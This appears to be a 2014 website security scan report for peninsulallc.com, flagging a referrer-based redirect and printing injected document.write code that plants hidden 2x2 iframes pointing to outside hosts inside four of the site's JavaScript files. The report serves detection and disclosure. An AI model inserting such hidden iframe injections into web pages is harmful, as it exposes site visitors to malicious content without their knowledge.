Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://peninsulallc.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: peninsulallc.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 21 Sep 2014 23:37:32 GMT Location: http://avonleephotography.com/zaaf.html?h=1480073 Server: Apache Content-Length: 299 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://peninsulallc.com/ | 200 OK Content-Length: 5632 Content-Type: text/html | clean |
http://peninsulallc.com/js/jquery.min.js | 200 OK Content-Length: 91894 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://avonleephotography.com/zaaf.html?j=1480073></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://info.thebeachfrontclub.com/mwed.html?j=1480073></iframe>'); (function(a,b){function cv(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cs(a){if(!cg Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://avonleephotography.com/zaaf.html?j=1480073 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://avonleephotography.com/zaaf.html?j=1480073> Hidden iFrame found. size: 2x2 src: http://info.thebeachfrontclub.com/mwed.html?j=1480073 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://info.thebeachfrontclub.com/mwed.html?j=1480073> | ||
http://peninsulallc.com/js/plugins/jquery.cycle.all.js | 200 OK Content-Length: 46398 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://avonleephotography.com/zaaf.html?j=1480073></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://info.thebeachfrontclub.com/mwed.html?j=1480073></iframe>'); ;(function($) { var ver = '2.88'; if ($.support == undefined) { $.support = { opacity: !($.browser.msie var bb = b < h ? b + parseInt(step * ((h-b)/count || 1)) : h; var rr = r < w ? r + parseInt(step * ((w-r)/count || 1)) : w; $next.css({ clip: 'rect('+tt+'px '+rr+'px '+bb+'px '+ll+'px)' }); (step++ <= count) ? setTimeout(f, 13) : $curr.css('display', 'none'); })(); }); opts.cssBefore = { display: 'block', opacity: 1, top: 0, left: 0 }; opts.animIn = { left: 0 }; opts.animOut = { left: 0 }; }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://info.thebeachfrontclub.com/mwed.html?j=1480073 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://info.thebeachfrontclub.com/mwed.html?j=1480073> Hidden iFrame found. size: 2x2 src: http://avonleephotography.com/zaaf.html?j=1480073 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://avonleephotography.com/zaaf.html?j=1480073> | ||
http://peninsulallc.com/index.html | 200 OK Content-Length: 5632 Content-Type: text/html | clean |
http://peninsulallc.com/history.html | 200 OK Content-Length: 4427 Content-Type: text/html | clean |
http://peninsulallc.com/development.html | 200 OK Content-Length: 5022 Content-Type: text/html | clean |
http://peninsulallc.com/portfolio.html | 200 OK Content-Length: 6583 Content-Type: text/html | clean |
http://peninsulallc.com/investor-relations.html | 200 OK Content-Length: 9527 Content-Type: text/html | clean |
http://peninsulallc.com/js/contactFunctions_investor.js | 200 OK Content-Length: 2282 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://avonleephotography.com/zaaf.html?j=1480073></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://info.thebeachfrontclub.com/mwed.html?j=1480073></iframe>'); var errorCss={"background-color":"#b2df62"} var defaultCss={"background-color":"#fff"} var ck_name = /^[A-Za-z\s]+ $("#formBox").hide(); $("#messageLog").show().html(msg) $("#messageLog a").css({ "cursor":"pointer", "text-decoration":"underline", "color":"#cbef8a" }).click(function(){ $("#formBox").show(); $("#messageLog").html("").hide(); }) } }); }); }) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://avonleephotography.com/zaaf.html?j=1480073 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://avonleephotography.com/zaaf.html?j=1480073> Hidden iFrame found. size: 2x2 src: http://info.thebeachfrontclub.com/mwed.html?j=1480073 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://info.thebeachfrontclub.com/mwed.html?j=1480073> | ||
http://peninsulallc.com/contact-us.html | 200 OK Content-Length: 8330 Content-Type: text/html | clean |
http://peninsulallc.com/js/contactFunctions.js | 200 OK Content-Length: 2252 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://avonleephotography.com/zaaf.html?j=1480073></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://info.thebeachfrontclub.com/mwed.html?j=1480073></iframe>'); var errorCss={"background-color":"#b2df62"} var defaultCss={"background-color":"#fff"} var ck_name = /^[A-Za-z\s]+ $("#contactFormId").hide(); $("#messageLog").html(msg).show(); $("#messageLog a").css({ "cursor":"pointer", "text-decoration":"underline", "color":"#cbef8a" }).click(function(){ $("#contactFormId").show(); $("#messageLog").html("").hide(); }) } }); }); }) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://info.thebeachfrontclub.com/mwed.html?j=1480073 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://info.thebeachfrontclub.com/mwed.html?j=1480073> Hidden iFrame found. size: 2x2 src: http://avonleephotography.com/zaaf.html?j=1480073 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://avonleephotography.com/zaaf.html?j=1480073> | ||
http://peninsulallc.com/philosophy.html | 200 OK Content-Length: 4905 Content-Type: text/html | clean |
http://peninsulallc.com/strategy.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://peninsulallc.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://peninsulallc.com/management-team.html | 200 OK Content-Length: 6904 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=peninsulallc.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://peninsulallc.com/
Result: peninsulallc.com is not infected or malware details are not published yet.
Result: peninsulallc.com is not infected or malware details are not published yet.